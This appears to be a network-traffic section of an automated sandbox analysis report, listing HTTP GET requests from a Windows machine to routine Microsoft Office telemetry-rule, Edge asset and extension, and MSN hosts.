Source: global traffic HTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
Source: global traffic HTTP traffic detected: GET /rules/rule120645v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120648v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120646v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120647v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120649v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120653v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120652v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120654v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120655v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120656v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120657v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120659v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120658v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120660v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120661v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120662v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120663v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120664v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120665v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120666v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120667v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120668v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120669v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /edgeoffer/pb/experiments?appId=edge-extensions&country=CH HTTP/1.1Host: api.edgeoffer.microsoft.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /rules/rule120674v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120673v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120672v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120670v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120671v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120676v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120677v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120679v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120675v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120678v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120602v10s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120601v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120680v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120681v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120682v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /crx/blobs/AYA8VyyVmiyWvldTRU0qGaR4RUSL6-YrG6uKRsMPsRWu4uzTWsENQ0Oe4TwjJlNxU5Vx3wW0XCsKQHAJ2XkWCO0eQ7UF3N9B6xg6w6N4ZQ_ezL5_s1EfR63s25vMOuhpdI4AxlKa5cntVqVuAOGwNK_pRVduNn5fPIzZ/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_83_1_0.crx HTTP/1.1Host: clients2.googleusercontent.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /rules/rule224901v11s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /assets/domains_config_gz/2.8.76/asset?assetgroup=EntityExtractionDomainsConfig HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveEdge-Asset-Group: EntityExtractionDomainsConfigSec-Mesh-Client-Edge-Version: 117.0.2045.55Sec-Mesh-Client-Edge-Channel: stableSec-Mesh-Client-OS: WindowsSec-Mesh-Client-OS-Version: 10.0.19045Sec-Mesh-Client-Arch: x86_64Sec-Mesh-Client-WebView: 0Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /rules/rule702350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /filestreamingservice/files/bdc392b9-6b81-4aaa-b3ee-2fffd9562edb?P1=1732019729&P2=404&P3=2&P4=gnachKdURufDv36ThjtFHmISXCAv74WMKGERX%2buGkAuOBjTjC3Fg7BTsj0nvai5BBtUD4CoZeTxf5JwTxVyvGw%3d%3d HTTP/1.1Host: msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.comConnection: keep-aliveMS-CV: nGH5u4YZbYBTm1hwGFyC7pSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /assets/edge_hub_apps_manifest_gz/4.7.107/asset?assetgroup=Shoreline HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveEdge-Asset-Group: ShorelineSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /rules/rule702201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700401v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700400v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703901v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703900v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/common.0baf1f64c7e61454b12f.js HTTP/1.1Host: assets2.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /rules/rule702801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703350v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703501v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703351v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /assets/edge_hub_apps_action_center_maximal_light.png/1.2.1/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /assets/edge_hub_apps_search_maximal_light.png/1.3.6/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /assets/edge_hub_apps_shopping_maximal_light.png/1.4.0/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /assets/edge_hub_apps_toolbox_maximal_light.png/1.5.13/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /assets/edge_hub_apps_games_maximal_light.png/1.7.1/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /assets/edge_hub_apps_M365_light.png/1.7.32/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /rules/rule703500v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /assets/edge_hub_apps_outlook_light.png/1.9.10/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /rules/rule701050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /assets/edge_hub_apps_edrop_maximal_light.png/1.1.12/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /rules/rule702751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703401v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703400v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
